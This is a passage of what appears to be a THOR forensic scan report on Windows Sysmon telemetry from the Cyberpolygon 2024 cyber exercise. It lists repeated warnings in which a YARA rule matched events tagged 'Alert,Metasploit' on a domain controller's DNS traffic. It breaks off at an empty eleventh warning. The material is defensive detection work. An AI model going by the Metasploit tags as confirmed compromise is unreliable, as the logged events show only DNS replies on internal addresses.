No filters applied

THOR Scan Report

Scan Information
Scanner Thor
Version 10.7.9
Run on System WIN-LRTT94FA08M
Argument list --path D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win --module filescan
Signature Database 2023/09/24-052825
Start Time Tue Sep 10 18:19:39 2024
End Time Tue Sep 10 18:29:12 2024
IP Addresses 10.100.5.12
Run as user WIN-LRTT94FA08M\Administrator
Admin rights yes
Platform Windows Server 2019 Standard
Log File Name WIN-LRTT94FA08M_thor_2024-09-10_1818.txt
False Positive Filters Applied 0
Scan ID S-9DFnio8ABo4
Modules
LogScan 27
Statistics
Alerts 0
Warnings 18
Notice 12
Info 121
Errors 0
Help
Shortcuts Use Ctrl+⬆ (Windows/Linux) or ⌘+⬆ (macOS) to return to the top of the page
Filters You can provide a file (--filter file) with regular expressions to suppress false positives
Hint 1 Select text and use the context menu to filter / select / lookup strings
Hint 2 Click on a module to filter for all events from that module.
Errors
Alerts
Warnings
Warning 1
Sep 10 18:18:47 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
32 bit THOR was executed on 64 bit system. For improved results, use the 64 bit version of THOR.
Warning 2
Sep 10 18:18:47 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
Signature file is older than 60 days. Run 'thor-util upgrade' to get new signatures.
Warning 3
Sep 10 18:21:31 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "xh4NtpEBNKI3r7qcPpS_", "_score": 1, "_source": {"@timestamp": "2024-09-03T04:03:16.879Z", "type": "wineventlog", "event": {"created": "2024-09-03T04:03:17.924Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "action": "Network connection detected (rule: NetworkConnect)", "code": "3", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 04:03:15.122\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44435\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "dc01", "os": {"name": "Windows Server 2019 Datacenter", "platform": "windows", "build": "17763.973", "version": "10.0", "kernel": "10.0.17763.97[...]domain": "NT AUTHORITY"}, "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 04:03:15.122", "Protocol": "udp", "SourcePort": "53", "ProcessId": 3348, "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIp": "10.24.7.2", "RuleName": "Alert,Metasploit", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "Initiated": "false", "DestinationPort": "44435"}, "record_id": 1097634, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "code": "3", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 4
Sep 10 18:21:31 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "Yx4OtpEBNKI3r7qcbsZG", "_score": 1, "_source": {"@timestamp": "2024-09-03T04:04:32.853Z", "type": "wineventlog", "event": {"created": "2024-09-03T04:04:34.620Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 04:04:31.181\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.118.57\nDestinationHostname: -\nDestinationPort: 44482\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "dc01", "os": {"platform": "windows", "name": "Windows Server 2019 Datacenter", "version": "10.0", "build": "17763.973", "kernel": "10.0[...], "domain": "NT AUTHORITY"}, "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 04:04:31.181", "Protocol": "udp", "ProcessId": 3348, "SourcePort": "53", "RuleName": "Alert,Metasploit", "DestinationIp": "10.24.118.57", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "Initiated": "false", "DestinationPort": "44482"}, "record_id": 1097674, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 5
Sep 10 18:22:00 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "MTGJtpEBNKI3r7qcN7QY", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:18:48.485Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:18:50.079Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:18:46.592\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44486\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "dc01", "os": {"name": "Windows Server 2019 Datacenter", "platform": "windows", "version": "10.0", "build": "17763.973", "kernel": "10.0.17[...]18", "domain": "NT AUTHORITY"}, "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:18:46.592", "ProcessId": 3348, "Protocol": "udp", "SourcePort": "53", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIp": "10.24.7.2", "RuleName": "Alert,Metasploit", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "DestinationPort": "44486", "Initiated": "false"}, "record_id": 1102865, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 6
Sep 10 18:22:00 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "6zCFtpEBNKI3r7qcA_6X", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:14:04.934Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:14:06.087Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:14:03.164\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44416\nDestinationPortName: -"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"id": "71952f51-1623-43c9-a67a-cf4232d9a08f", "os": {"name": "Windows Server 2019 Datacenter", "platform": "windows", "version": "10.0", "build": "[...]e": "Microsoft-Windows-Sysmon", "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:14:03.164", "ProcessId": 3348, "Protocol": "udp", "SourcePort": "53", "RuleName": "Alert,Metasploit", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIp": "10.24.7.2", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "Initiated": "false", "DestinationPort": "44416"}, "record_id": 1102815, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 7
Sep 10 18:22:05 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "mjCCtpEBNKI3r7qc1qT4", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:11:41.701Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:11:43.563Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:11:40.391\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44494\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "dc01", "os": {"name": "Windows Server 2019 Datacenter", "platform": "windows", "build": "17763.973", "version": "10.0", "kernel": "10.0.17[...]e": "Microsoft-Windows-Sysmon", "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:11:40.391", "ProcessId": 3348, "Protocol": "udp", "SourcePort": "53", "DestinationIp": "10.24.7.2", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "RuleName": "Alert,Metasploit", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "DestinationPort": "44494", "Initiated": "false"}, "record_id": 1102805, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 8
Sep 10 18:22:09 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "xzOTtpEBNKI3r7qc2ndu", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:30:21.668Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:30:23.640Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:30:20.566\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44422\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"id": "71952f51-1623-43c9-a67a-cf4232d9a08f", "os": {"platform": "windows", "name": "Windows Server 2019 Datacenter", "version": "10.0", "build": "[...]e": "Microsoft-Windows-Sysmon", "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:30:20.566", "Protocol": "udp", "SourcePort": "53", "ProcessId": 3348, "RuleName": "Alert,Metasploit", "DestinationIp": "10.24.7.2", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "Initiated": "false", "DestinationPort": "44422"}, "record_id": 1103476, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 9
Sep 10 18:22:13 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "YzSYtpEBNKI3r7qcvIAf", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:35:39.350Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:35:40.707Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "action": "Network connection detected (rule: NetworkConnect)", "code": "3", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:35:37.740\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44402\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"id": "71952f51-1623-43c9-a67a-cf4232d9a08f", "os": {"platform": "windows", "name": "Windows Server 2019 Datacenter", "build": "17763.973", "version": "1[...]domain": "NT AUTHORITY"}, "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:35:37.740", "SourcePort": "53", "ProcessId": 3348, "Protocol": "udp", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIp": "10.24.7.2", "RuleName": "Alert,Metasploit", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "DestinationPort": "44402", "Initiated": "false"}, "record_id": 1103540, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "code": "3", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 10
Sep 10 18:22:16 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "9DGKtpEBNKI3r7qcsfZN", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:20:19.575Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:20:21.263Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:20:17.858\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44423\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "dc01", "os": {"platform": "windows", "name": "Windows Server 2019 Datacenter", "build": "17763.973", "version": "10.0", "kernel": "10.0.17[...]e": "Microsoft-Windows-Sysmon", "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:20:17.858", "Protocol": "udp", "ProcessId": 3348, "SourcePort": "53", "DestinationIp": "10.24.7.2", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "RuleName": "Alert,Metasploit", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "DestinationPort": "44423", "Initiated": "false"}, "record_id": 1103116, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 11
Sep 10 18:22:31 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
